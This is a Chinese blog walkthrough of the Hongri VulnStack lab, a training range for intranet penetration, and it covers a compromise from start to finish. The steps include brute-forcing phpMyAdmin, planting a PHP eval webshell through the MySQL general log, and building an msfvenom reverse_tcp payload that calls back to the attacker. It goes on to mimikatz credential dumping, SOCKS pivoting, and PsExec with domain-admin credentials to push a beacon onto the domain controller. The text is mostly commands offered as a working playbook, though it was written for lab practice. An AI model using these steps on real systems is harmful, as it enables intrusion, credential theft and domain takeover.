目录

环境介绍

信息收集

内网主机存活扫描

masscan扫描 ​

Nmap扫描

访问80端口

目录扫描

漏洞利用

探测phpstudy的phpmyadmin目录

爆破数据库密码

phpmyadmin漏洞利用

查看能否写入文件

查看是否能写入日志

执行一句话木马

蚁剑连接

信息收集

拿到webshell后进行信息收集

判断是否有域

后渗透

msf上线

利用蚁剑上传木马

msf信息收集

提权

抓取域用户的密码信息

远程连接

跨网段横向渗透

msf socks4a proxychains 穿透内网

sockscap64代理远程连接

域内信息收集

跨网段主机信息收集

横向渗透

拿域成员

ms12-020攻击蓝屏

拿域控

msf派生给cs

cs基于web服务器生成监听器

psexec64攻击


环境介绍

环境介绍:                                    内网
kali           192.168.171.137
win7           192.168.171.153         192.168.52.130    win7 web虚拟机 开启 phpstudy服务
win2003                                192.168.52.131
win2008                                192.168.52.138

信息收集

内网主机存活扫描

netdiscover -i eht0 -r 192.168.171.0/24192.168.171.153则为目标机

masscan扫描

masscan 192.168.171.0/24 -p 1-65535 --rate 1000
(rate的值越大可能会被封禁,适当调小些)

Nmap扫描

nmap -O 192.168.171.153

访问80端口

目录扫描

dirsearch -u 192.168.171.153

漏洞利用

探测phpstudy的phpmyadmin目录

发现数据库登录框

爆破数据库密码

密码为root

phpmyadmin漏洞利用

查看用户的权限

查看能否写入文件

mysql   into写入文件:使用需看要secure_file_priv的值。value为“null”时,不允许读取任意文件value为其余路径时,表示该路径可以读写文件value为“空”时,允许读取任意文件用show global variables like '%secure%' 命令查看

是关闭的,不能执行写入文件

查看是否能写入日志

查看日志功能是否开启show global variables like '%general%'未开启的话设置为 onset global general_log='ON'开启后将日志文件的存储位置改为可访问到的根目录(phpstudy能看到根目录)set global  general_log_file = 'C:/WWW/1.php'执行下边一句话木马,数据库将会将查询语句保存在日志文件中SELECT '<?php @eval($_POST["cmd"]); ?>'写入成功后 使用蚁剑连接

执行一句话木马

把它记录到日志里

蚁剑连接

连接成功

信息收集

拿到webshell后进行信息收集

判断是否有域

判断方法
查看网关IP地址、DNS的ip地址、域名、本机是否和DNS服务器处于同一网段等信息。whoami
ipconfig /all
systeminfo具体判断方法
https://blog.csdn.net/qq_36279445/article/details/110647055

发现一个新网段
192.168.52.130

因为在域内 所以 有必要进行后渗透 拿下域控

后渗透

msf上线

生成exe木马msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.171.137 LPORT=2333 -f exe > hack.exe 开启监听use exploit/multi/handler set payload windows/meterpreter/reverse_tcpset lport 2333set lhost 192.168.171.137

利用蚁剑上传木马

执行

利用成功

msf信息收集

扫描同一网段主机
run arp_scanner -r 192.168.52.0/24
发现192.168.52.130存活,因为只开了一个VM2所以只扫到130

提权

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM  最高权限所以不用提权

这个是正常提权

抓取域用户的密码信息

加载mimikatz模块
Windows10/2012 以下的版本可以直接抓取明文密码再尝试加载 mimikatz 模块,加载模块前需要先将meterpreter迁移到64位的进程,而且该进程也需要 是system权限运行的。
ps 查看进程
migrate PID
load mimikatz
creds_kerberos

mimikata的使用
cls:        清屏
standard:   标准模块,基本命令
crypto:     加密相关模块
sekurlsa:   与证书相关的模块
kerberos:   kerberos模块
privilege:  提权相关模块
process:    进程相关模块
service:    服务相关模块
lsadump:    LsaDump模块
ts:         终端服务器模块
event:      事件模块
misc:       杂项模块
token:      令牌模块
vault:      令牌操作模块
minesweepre:Mine Sweeper模块
dpapi:      DPAPI模块(通过API或RAW访问)[数据保护应用程序编程接口]
busyloght:  BusyLight Module
sysenv:     系统环境值模块
sid:        安全标识符模块
iis:        IIS XML配置模块
rpc:        mimikatz的RPC控制
sr98:       RDM(830AL)器件的射频模块
acr:        ACR模块
version:    查看版本
exit:       推出
creds_msv:  获取密码hash值
creds_kerberos:    获取密码明文

远程连接

nmap -p 3389 192.168.171.153发现端口关闭,用meterpreter打开
run post/windows/manage/enable_rdp

打开3389端口run post/windows/manage/enable_rdp

跨网段横向渗透

msf socks4a proxychains 穿透内网

添加路由
run autoroute -s 192.168.52.0/24
查看路由
run autoroute -p
background  返回
route print  输出路由use auxiliary/server/socks_proxy
这里说一下,msf5是有socks4a、5a的msf6是只有socks_proxy的,需要在options设置set version 4a
set srvhost 192.168.171.137
set srvport 1080
run

配置 kali socks代理
配置proxychains:
vi/etc/proxychains.conf 

proxychains curl 192.168.52.130
访问成功 说明 代理添加成功
Proxychains nmap -sT -Pn 192.168.52.130
查看端口是否可以连接

sockscap64代理远程连接

用户名前边要加上域

连接成功

域内信息收集

net time /domain        #查看时间服务器
net user /domain        #查看域用户
net view /domain        #查看有几个域
net view /domain:GOD  #查看GOD    域情况
nslookup  主机名           #查看域内其他主机  可能ip查不出来
net group "domain computers" /domain         #查看域内所有的主机名
net group "domain admins"   /domain          #查看域管理员
net group "domain controllers" /domain       #查看域控

跨网段主机信息收集

auxiliary/scanner/discovery/udp_sweep    #基于udp协议发现内网存活主机
auxiliary/scanner/discovery/udp_probe    #基于udp协议发现内网存活主机
auxiliary/scanner/netbios/nbname         #基于netbios协议发现内网存活主机
proxychains nmap -Pn -sT 192.168.52.130
auxiliary/scanner/portscan/tcp           #基于tcp进行端口扫描(默认扫描1-10000)
auxiliary/scanner/ftp/ftp_version            #发现内网ftp服务,基于默认21端口
auxiliary/scanner/ssh/ssh_version            #发现内网ssh服务,基于默认22端口
auxiliary/scanner/telnet/telnet_version      #发现内网telnet服务,基于默认23端口
auxiliary/scanner/dns/dns_amp                #发现dns服务,基于默认53端口
auxiliary/scanner/http/http_version          #发现内网http服务,基于默认80端口
auxiliary/scanner/http/title                 #探测内网http服务的标题
auxiliary/scanner/smb/smb_version            #发现内网smb服务,基于默认的445端口
auxiliary/scanner/mssql/mssql_schemadump     #发现内网SQLServer服务,基于默认的1433端口
auxiliary/scanner/oracle/oracle_hashdump     #发现内网oracle服务,基于默认的1521端口
auxiliary/scanner/mysql/mysql_version        #发现内网mysql服务,基于默认3306端口
auxiliary/scanner/rdp/rdp_scanner            #发现内网RDP服务,基于默认3389端口
auxiliary/scanner/redis/redis_server         #发现内网Redis服务,基于默认6379端口
auxiliary/scanner/db2/db2_version            #探测内网的db2服务,基于默认的50000端口
auxiliary/scanner/netbios/nbname             #探测内网主机的netbios名字

横向渗透

拿域成员

ms12-020攻击蓝屏

打坏了

拿域控

是可以直接拿域控的,域成员坏了就坏了吧

msf派生给cs

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true #默认情况下,payload_inject执行之后会在本地产生一个新 的handler,由于我们已经有了一个,所以不需要在产生一个,所以这里我们设置为true
set lhost 192.168.157.137 #cobaltstrike监听的ip
set lport 14444 #cobaltstrike监听的端口
set session 1 #这里是获得的session的id
exploit

利用cs直接生成蚁剑上传也可

上线成功

cs基于web服务器生成监听器

psexec64攻击

链接:https://pan.baidu.com/s/184mAAqriuoQ4crI5yABonA
提取码:nail
通过蚁剑上传psexec64.exe 到web服务器web执行 psexec命令1.#上传木马文件
PsExec64.exe -accepteula \\192.168.52.138 -u god\administrator -p Hongrisec@2019 -d -c C:\windows\temp\beacon.exe
2.#打开 域控cmd  并执行 上线
PsExec64.exe -accepteula \\192.168.52.138 -u god\administrator -p Hongrisec@2019 -s cmd
cd..                 #返回到上级 c:/windows目录
dir | findstr beacon        #看是否上传beacon32.exe成功
beacon64.exe                #执行

域控主机上线成功

拿下

红日靶场--内网渗透练习相关推荐

  1. 记一次艰难的多节点YXcms靶场内网渗透

    Yxcms是一款高效,灵活,实用,免费的企业建站系统,基于PHP和mysql技术,采用MVC三层架构,后台登录账号是admin密码123456 下载链接:https://pan.baidu.com/s ...

  2. 红日安全内网渗透笔记

    靶场下载地址:漏洞详情 环境配置参考:[红日安全-VulnStack]ATT&CK实战系列--红队实战(二) - yokan - 博客园 此实战仅有3台机器 DMZ区的WEB机 .核心区的AD ...

  3. 内网渗透|红日安全团队靶场渗透笔记|Mimikatz|MSF跳板

    靶场下载:漏洞详情​​​​​​ 环境搭建: 文件下载下来有三个压缩包,分别对应域中三台主机: VM1对应win7是web服务器 VM2对应windows2003是域成员 VM3对应windows se ...

  4. 内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

    内网安全:内网渗透.(拿到内网主机最高权限) 内网穿透又被称为NAT穿透,内网端口映射外网,在处于使用了NAT设备的私有TCP/IP网络中的主机之间建立连接的问题.通过映射端口,让外网的电脑找到处于内 ...

  5. vulnstack内网渗透环境靶场-1 大全

    一.搭建vulnstack靶场环境 主要以真实企业环境为实例搭建一系列靶场,通过练习另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环,下载地址: http://vulnstack ...

  6. 三层网络靶场搭建MSF内网渗透

    三层网络靶场搭建&MSF内网渗透 在最近的CTF比赛中,综合靶场出现的次数越来越多,这种形式的靶场和真实的内网渗透很像,很贴合实际工作,但我们往往缺少多层网络的练习环境.本文通过VMware搭 ...

  7. 网络靶场实战-记一次大型内网渗透实践 【一】

    本场景是基于"火天网境攻防演训靶场"进行搭建,通过靶场内置的演训导调.演训裁判以及演训运维功能,可以对整个攻防演练过程进行管控和详尽的评估与复盘. 1.场景准备 · 场景名称 某大 ...

  8. 内网渗透—红日安全vulnstack(二)

    文章目录 1. 环境说明 2. 开启靶场 3. 外网渗透 3.1 端口扫描 3.2 拿shell 3.2.1 CVE-2019-2725 3.2.2 MSF17-010 3.3 提权 4. 内网渗透 ...

  9. 内网渗透靶场 Vulnstack(一)

    虽然网上说这个靶场不是很难,但我自己做起来还是困难重重,很多知识不了解,msf与cs都搞了一下,搞了蛮久的,学到了不少,继续努力!!! 首先对内网域进行了解一下. 域是计算机网络的一种形式,其中所有用 ...

最新文章

  1. 关于学习Python的一点学习总结(34->构造函数->重写方法和特殊构造)
  2. Android 调试 Release 包(debuggable)
  3. Spring Boot——获取上传文件的MD5值解决方案
  4. Editability on SAP Text
  5. 谨记2017年8月30日10:03:26
  6. 使用kibana可视化报表实时监控你的应用程序
  7. 无法检索文件服务器,无服务器快速无法检索pdf文件(base64编码)
  8. gettimeofday_PHP gettimeofday()函数与示例
  9. 算法高级(10)-如何实现浏览器的前进、后退功能
  10. java为什么删除jpg删不掉_java-如何在不损失质量的情况下从图像(JPG)删除元数据?...
  11. oracle 时间函数
  12. mysql日期函数转换_Mysql日期函数大全 转
  13. vue 利用科大讯飞实现实时语音转写
  14. css 魔方,css 3d旋转魔方
  15. java矩形排样_优化排样(板材矩形一刀切算法)
  16. 【d3】树图-各种效果集合(附效果图)
  17. 服务计算——net/http源码追踪
  18. 做ctf题目的时候运行程序就会显示ImportError: cannot import name ‘flag‘ from ‘secret‘ 求大佬解答
  19. pg服务管理 与 psql常用命令
  20. 出租车数据的地图展示

热门文章

  1. 数据通信技术_数据通信相关汇总
  2. 系统时间转换为时间戳 时间戳转换为毫秒
  3. Python是什么?Python能干什么?让我来告诉你
  4. matlab simulink 车辆能耗_[Lib库 1]CoppeliaSim差分避障小车的Simulink实现
  5. 中传影视王鑫:大数据在传媒领域的应用
  6. android USB连接电脑只充电问题
  7. 梁梦瑶 20190919-6 四则运算
  8. Linux Centos6 下载
  9. BlackBerry 快捷键
  10. 什么是极坐标方程 极坐标做画图 rd​原理; 弧长积分公式 极坐标弧积分 极坐标面积积分公式 极坐标与直角坐标的转化 如何将直角坐标方程Y=X转化成极坐标